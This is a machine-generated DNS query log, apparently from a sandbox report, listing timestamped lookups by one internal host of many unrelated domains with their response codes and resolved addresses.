                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.469119072 CET8.8.8.8192.168.2.60xa552Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.485094070 CET8.8.8.8192.168.2.60xfccdNo error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.489790916 CET8.8.8.8192.168.2.60xeff5Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.501440048 CET8.8.8.8192.168.2.60x339No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.512943983 CET8.8.8.8192.168.2.60x930cName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.518739939 CET8.8.8.8192.168.2.60x90caName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.546873093 CET8.8.8.8192.168.2.60xf8eaName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.569451094 CET8.8.8.8192.168.2.60x2396No error (0)assideum.com52.219.92.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.594481945 CET8.8.8.8192.168.2.60x5ed5No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.605609894 CET8.8.8.8192.168.2.60xed19No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.625163078 CET8.8.8.8192.168.2.60x8d77No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.629067898 CET8.8.8.8192.168.2.60xcd4dNo error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.629067898 CET8.8.8.8192.168.2.60xcd4dNo error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.629067898 CET8.8.8.8192.168.2.60xcd4dNo error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.629067898 CET8.8.8.8192.168.2.60xcd4dNo error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.674892902 CET8.8.8.8192.168.2.60xba71No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.674892902 CET8.8.8.8192.168.2.60xba71No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.674892902 CET8.8.8.8192.168.2.60xba71No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.674892902 CET8.8.8.8192.168.2.60xba71No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.707700014 CET8.8.8.8192.168.2.60xd16aNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.739505053 CET8.8.8.8192.168.2.60xd504No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.810250998 CET8.8.8.8192.168.2.60xe4d0No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.835268974 CET8.8.8.8192.168.2.60xefccNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.879717112 CET8.8.8.8192.168.2.60xc92No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.954915047 CET8.8.8.8192.168.2.60x3c7No error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.054577112 CET8.8.8.8192.168.2.60x850dNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.114291906 CET8.8.8.8192.168.2.60xab6No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.115852118 CET8.8.8.8192.168.2.60xdce4No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.115852118 CET8.8.8.8192.168.2.60xdce4No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.121073961 CET8.8.8.8192.168.2.60xd47cNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.121073961 CET8.8.8.8192.168.2.60xd47cNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.123363972 CET8.8.8.8192.168.2.60xca70No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.140121937 CET8.8.8.8192.168.2.60x53d8No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.218600035 CET8.8.8.8192.168.2.60x10d0No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.296744108 CET8.8.8.8192.168.2.60x9030No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.309027910 CET8.8.8.8192.168.2.60x76faNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.361541986 CET8.8.8.8192.168.2.60xece5No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.361541986 CET8.8.8.8192.168.2.60xece5No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.391381979 CET8.8.8.8192.168.2.60x4f7cNo error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.412075996 CET8.8.8.8192.168.2.60x383aNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.418446064 CET8.8.8.8192.168.2.60x815bNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.430742025 CET8.8.8.8192.168.2.60xe802No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.557859898 CET8.8.8.8192.168.2.60x7bc5No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.559061050 CET8.8.8.8192.168.2.60x52b5No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.581302881 CET8.8.8.8192.168.2.60x20a4No error (0)umcor.am188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.581302881 CET8.8.8.8192.168.2.60x20a4No error (0)umcor.am188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.594274044 CET8.8.8.8192.168.2.60x85e3No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.617593050 CET8.8.8.8192.168.2.60x63deNo error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.618156910 CET8.8.8.8192.168.2.60x6dd0No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.639930964 CET8.8.8.8192.168.2.60x4f74Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.669559002 CET8.8.8.8192.168.2.60x4f74Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.673837900 CET8.8.8.8192.168.2.60xed63Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.680874109 CET8.8.8.8192.168.2.60x4ce6Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.691442013 CET8.8.8.8192.168.2.60x3f55No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.691442013 CET8.8.8.8192.168.2.60x3f55No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.695108891 CET8.8.8.8192.168.2.60xe9afName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.696976900 CET8.8.8.8192.168.2.60x7d89Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.715734959 CET8.8.8.8192.168.2.60x5da5No error (0)polprime.com154.214.189.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.721991062 CET8.8.8.8192.168.2.60xd0e9Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.735888004 CET8.8.8.8192.168.2.60x158fNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.737385988 CET8.8.8.8192.168.2.60x6b34Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.752973080 CET8.8.8.8192.168.2.60x8b8No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.752973080 CET8.8.8.8192.168.2.60x8b8No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.752973080 CET8.8.8.8192.168.2.60x8b8No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.802901983 CET8.8.8.8192.168.2.60x9cc9Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.810241938 CET8.8.8.8192.168.2.60xca16No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.820306063 CET8.8.8.8192.168.2.60x721aNo error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.820306063 CET8.8.8.8192.168.2.60x721aNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.820306063 CET8.8.8.8192.168.2.60x721aNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.820306063 CET8.8.8.8192.168.2.60x721aNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.829247952 CET8.8.8.8192.168.2.60x53abNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.830306053 CET8.8.8.8192.168.2.60xff0fNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.875430107 CET8.8.8.8192.168.2.60x14f6No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.917073965 CET8.8.8.8192.168.2.60xebf2No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.925046921 CET8.8.8.8192.168.2.60x9ecdNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.925046921 CET8.8.8.8192.168.2.60x9ecdNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.938219070 CET8.8.8.8192.168.2.60x54e7No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.938219070 CET8.8.8.8192.168.2.60x54e7No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.956978083 CET8.8.8.8192.168.2.60xcb7fNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:19.990385056 CET8.8.8.8192.168.2.60xa77dNo error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.083015919 CET8.8.8.8192.168.2.60x5705No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.083015919 CET8.8.8.8192.168.2.60x5705No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.108732939 CET8.8.8.8192.168.2.60xb76fNo error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.108732939 CET8.8.8.8192.168.2.60xb76fNo error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.145639896 CET8.8.8.8192.168.2.60xf30cNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.160916090 CET8.8.8.8192.168.2.60x2858Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.161369085 CET8.8.8.8192.168.2.60xf8c8No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.161369085 CET8.8.8.8192.168.2.60xf8c8No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.174107075 CET8.8.8.8192.168.2.60x7d40No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.188560963 CET8.8.8.8192.168.2.60x4e6cNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.196857929 CET8.8.8.8192.168.2.60x7bb8Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.211766005 CET8.8.8.8192.168.2.60xa3cbName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.222511053 CET8.8.8.8192.168.2.60x42ddName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.235023975 CET8.8.8.8192.168.2.60x378eName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.267343998 CET8.8.8.8192.168.2.60x9fe2Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.371051073 CET8.8.8.8192.168.2.60xe6d0No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.390322924 CET8.8.8.8192.168.2.60x266No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.447760105 CET8.8.8.8192.168.2.60x47ddNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.455727100 CET8.8.8.8192.168.2.60x5947No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.455727100 CET8.8.8.8192.168.2.60x5947No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.455727100 CET8.8.8.8192.168.2.60x5947No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.472899914 CET8.8.8.8192.168.2.60x2226No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.472899914 CET8.8.8.8192.168.2.60x2226No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.511183977 CET8.8.8.8192.168.2.60x6771Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.511687994 CET8.8.8.8192.168.2.60xf065No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.511687994 CET8.8.8.8192.168.2.60xf065No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.517034054 CET8.8.8.8192.168.2.60xa6cNo error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.517034054 CET8.8.8.8192.168.2.60xa6cNo error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.517911911 CET8.8.8.8192.168.2.60xdaaServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.535681963 CET8.8.8.8192.168.2.60xff7bNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.535681963 CET8.8.8.8192.168.2.60xff7bNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.544034958 CET8.8.8.8192.168.2.60x598bNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.546044111 CET8.8.8.8192.168.2.60x6b92No error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.546044111 CET8.8.8.8192.168.2.60x6b92No error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.555325031 CET8.8.8.8192.168.2.60x7ea3No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.566180944 CET8.8.8.8192.168.2.60xf93dNo error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.566180944 CET8.8.8.8192.168.2.60xf93dNo error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.583915949 CET8.8.8.8192.168.2.60xeee6No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.587502003 CET8.8.8.8192.168.2.60x9f9fNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.606029987 CET8.8.8.8192.168.2.60x56dfNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.606029987 CET8.8.8.8192.168.2.60x56dfNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.608484030 CET8.8.8.8192.168.2.60xac21No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.613228083 CET8.8.8.8192.168.2.60x2358No error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.616568089 CET8.8.8.8192.168.2.60x16e3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.617754936 CET8.8.8.8192.168.2.60x5f26No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.652159929 CET8.8.8.8192.168.2.60x91No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.687484026 CET8.8.8.8192.168.2.60x8c95Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.729679108 CET8.8.8.8192.168.2.60x4ce6Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.763938904 CET8.8.8.8192.168.2.60xb74bName error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.783303022 CET8.8.8.8192.168.2.60xdbc0No error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.783303022 CET8.8.8.8192.168.2.60xdbc0No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.783303022 CET8.8.8.8192.168.2.60xdbc0No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.783303022 CET8.8.8.8192.168.2.60xdbc0No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.808516979 CET8.8.8.8192.168.2.60x6c37No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.808516979 CET8.8.8.8192.168.2.60x6c37No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.823415995 CET8.8.8.8192.168.2.60x58a8Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.831882954 CET8.8.8.8192.168.2.60xd92cNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.831882954 CET8.8.8.8192.168.2.60xd92cNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.833754063 CET8.8.8.8192.168.2.60xf074Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.844396114 CET8.8.8.8192.168.2.60x1c33No error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.844396114 CET8.8.8.8192.168.2.60x1c33No error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.844396114 CET8.8.8.8192.168.2.60x1c33No error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.919050932 CET8.8.8.8192.168.2.60x3fcdNo error (0)araax.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.919050932 CET8.8.8.8192.168.2.60x3fcdNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.919050932 CET8.8.8.8192.168.2.60x3fcdNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.919050932 CET8.8.8.8192.168.2.60x3fcdNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.929606915 CET8.8.8.8192.168.2.60x6a8Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.946023941 CET8.8.8.8192.168.2.60xc1a4No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.946023941 CET8.8.8.8192.168.2.60xc1a4No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.946023941 CET8.8.8.8192.168.2.60xc1a4No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.946023941 CET8.8.8.8192.168.2.60xc1a4No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.946734905 CET8.8.8.8192.168.2.60x9454Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.967381001 CET8.8.8.8192.168.2.60xfa0fNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:20.987345934 CET8.8.8.8192.168.2.60xad83No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.014900923 CET8.8.8.8192.168.2.60x30eNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.075799942 CET8.8.8.8192.168.2.60xcf14No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.075799942 CET8.8.8.8192.168.2.60xcf14No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.119621992 CET8.8.8.8192.168.2.60x9493No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.169193983 CET8.8.8.8192.168.2.60x934fNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.255037069 CET8.8.8.8192.168.2.60xd649Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:21.356285095 CET8.8.8.8192.168.2.60xa7dcNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
